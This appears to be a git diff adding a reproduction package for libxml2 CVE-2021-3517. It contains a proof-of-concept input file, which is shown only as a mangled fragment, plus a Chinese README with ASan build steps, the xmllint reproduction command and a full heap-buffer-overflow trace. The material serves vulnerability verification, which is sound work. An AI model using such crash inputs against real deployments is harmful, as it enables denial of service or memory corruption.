diff --git a/cve/libxml2/2021/CVE-2021-3517/CVE-2021-3517-poc b/cve/libxml2/2021/CVE-2021-3517/CVE-2021-3517-poc
new file mode 100644
index 0000000000000000000000000000000000000000..06c3e0bdff5ce3debcef5a591fd72019a1f7aa5f
--- /dev/null
+++ b/cve/libxml2/2021/CVE-2021-3517/CVE-2021-3517-poc
@@ -0,0 +1,4 @@
+ ">]>
+
+
+
diff --git a/cve/libxml2/2021/CVE-2021-3517/README.md b/cve/libxml2/2021/CVE-2021-3517/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..910409f012f1793b57d6f50f9d972cb7105524dd
--- /dev/null
+++ b/cve/libxml2/2021/CVE-2021-3517/README.md
@@ -0,0 +1,101 @@
+## 漏洞验证
+### 下载源码
+https://gitee.com/openkylin/libxml2 (版本:2.9.10+dfsg-ok1)
+
+### 编译
+```bash
+$ cd libxml2
+#下载编译依赖
+$ sudo apt install libicu-dev liblzma-dev libpython3-all-dbg libpython3-all-dev pkg-config python3-all-dbg python3-all-dev rename zlib1g-dev
+#开启-ggdb -fsanitize=address
+$ CFLAGS="-ggdb -fsanitize=address" ./configure
+#编译
+$ make
+```
+
+### 漏洞复现
+```bash
+$./xmllint --recover --postvalid ../CVE/CVE-2021-3517-poc
+../CVE/CVE-2021-3517-poc:3: parser error : Input is not proper UTF-8, indicate encoding !
+Bytes: 0xEC 0x22 0x20 0x69
+
+ ">
+]>
+
+
+
+../CVE/CVE-2021-3517-poc:2: element stylesheet: validity error : No declaration for element stylesheet
+../CVE/CVE-2021-3517-poc:2: element stylesheet: validity error : No declaration for attribute version of element stylesheet
+../CVE/CVE-2021-3517-poc:2: element stylesheet: validity error : No declaration for attribute xmlns:xsl of element stylesheet
+../CVE/CVE-2021-3517-poc:3: element output: validity error : No declaration for element output
+=================================================================
+==17323==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000236 at pc 0x7f80e3d65a54 bp 0x7ffeffc91450 sp 0x7ffeffc91440
+READ of size 1 at 0x602000000236 thread T0
+ #0 0x7f80e3d65a53 in xmlEncodeEntitiesInternal /data1/libxml2-openkylin-yangtze/entities.c:583
+ #1 0x7f80e3d65b9b in xmlEncodeAttributeEntities /data1/libxml2-openkylin-yangtze/entities.c:760
+ #2 0x7f80e3dfe3a0 in xmlNodeListGetString__internal_alias /data1/libxml2-openkylin-yangtze/tree.c:1699
+ #3 0x7f80e3e63280 in xmlValidateElement__internal_alias /data1/libxml2-openkylin-yangtze/valid.c:6483
+ #4 0x7f80e3e63501 in xmlValidateElement__internal_alias /data1/libxml2-openkylin-yangtze/valid.c:6502
+ #5 0x7f80e3e65893 in xmlValidateDocument__internal_alias /data1/libxml2-openkylin-yangtze/valid.c:6942
+ #6 0x562ea788e703 in parseAndPrintFile /data1/libxml2-openkylin-yangtze/xmllint.c:2799
+ #7 0x562ea7894cba in main /data1/libxml2-openkylin-yangtze/xmllint.c:3728
+ #8 0x7f80e3b090b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
+ #9 0x562ea7884aed in _start (/data1/libxml2-openkylin-yangtze/.libs/xmllint+0xfaed)
+
+0x602000000236 is located 0 bytes to the right of 6-byte region [0x602000000230,0x602000000236)
+allocated by thread T0 here:
+ #0 0x7f80e42a5bc8 in malloc (/lib/x86_64-linux-gnu/libasan.so.5+0x10dbc8)
+ #1 0x7f80e3f4427d in xmlBufResize /data1/libxml2-openkylin-yangtze/buf.c:827
+ #2 0x7f80e3f449a3 in xmlBufAdd /data1/libxml2-openkylin-yangtze/buf.c:902
+ #3 0x7f80e3dfd262 in xmlStringLenGetNodeList__internal_alias /data1/libxml2-openkylin-yangtze/tree.c:1452
+ #4 0x7f80e406f4d8 in xmlSAX2AttributeNs /data1/libxml2-openkylin-yangtze/SAX2.c:2057
+ #5 0x7f80e4071cbb in xmlSAX2StartElementNs__internal_alias /data1/libxml2-openkylin-yangtze/SAX2.c:2427
+ #6 0x7f80e3dcc218 in xmlParseStartTag2 /data1/libxml2-openkylin-yangtze/parser.c:9593
+ #7 0x7f80e3dd0614 in xmlParseElementStart /data1/libxml2-openkylin-yangtze/parser.c:9962
+ #8 0x7f80e3dcfaaf in xmlParseContent__internal_alias /data1/libxml2-openkylin-yangtze/parser.c:9862
+ #9 0x7f80e3dcff04 in xmlParseElement__internal_alias /data1/libxml2-openkylin-yangtze/parser.c:9912
+ #10 0x7f80e3dd9417 in xmlParseDocument__internal_alias /data1/libxml2-openkylin-yangtze/parser.c:10748
+ #11 0x7f80e3df5dcb in xmlDoRead /data1/libxml2-openkylin-yangtze/parser.c:15221
+ #12 0x7f80e3df5fdf in xmlReadFile__internal_alias /data1/libxml2-openkylin-yangtze/parser.c:15283
+ #13 0x562ea788cb01 in parseAndPrintFile /data1/libxml2-openkylin-yangtze/xmllint.c:2388
+ #14 0x562ea7894cba in main /data1/libxml2-openkylin-yangtze/xmllint.c:3728
+ #15 0x7f80e3b090b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
+
+SUMMARY: AddressSanitizer: heap-buffer-overflow /data1/libxml2-openkylin-yangtze/entities.c:583 in xmlEncodeEntitiesInternal
+Shadow bytes around the buggy address:
+ 0x0c047fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ 0x0c047fff8000: fa fa 06 fa fa fa 00 01 fa fa 00 01 fa fa 07 fa
+ 0x0c047fff8010: fa fa 00 03 fa fa 06 fa fa fa 00 01 fa fa 05 fa
+ 0x0c047fff8020: fa fa fd fa fa fa fd fa fa fa fd fa fa fa 04 fa
+ 0x0c047fff8030: fa fa 00 03 fa fa fd fa fa fa fd fa fa fa fd fd
+=>0x0c047fff8040: fa fa 04 fa fa fa[06]fa fa fa fd fd fa fa fd fa
+ 0x0c047fff8050: fa fa fd fa fa fa fd fd fa fa fd fa fa fa fd fd
+ 0x0c047fff8060: fa fa 07 fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0c047fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0c047fff8080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0c047fff8090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+Shadow byte legend (one shadow byte represents 8 application bytes):
+ Addressable: 00
+ Partially addressable: 01 02 03 04 05 06 07
+ Heap left redzone: fa
+ Freed heap region: fd
+ Stack left redzone: f1
+ Stack mid redzone: f2
+ Stack right redzone: f3
+ Stack after return: f5
+ Stack use after scope: f8
+ Global redzone: f9
+ Global init order: f6
+ Poisoned by user: f7
+ Container overflow: fc
+ Array cookie: ac
+ Intra object redzone: bb
+ ASan internal: fe
+ Left alloca redzone: ca
+ Right alloca redzone: cb
+ Shadow gap: cc
+==17323==ABORTING
+```
\ No newline at end of file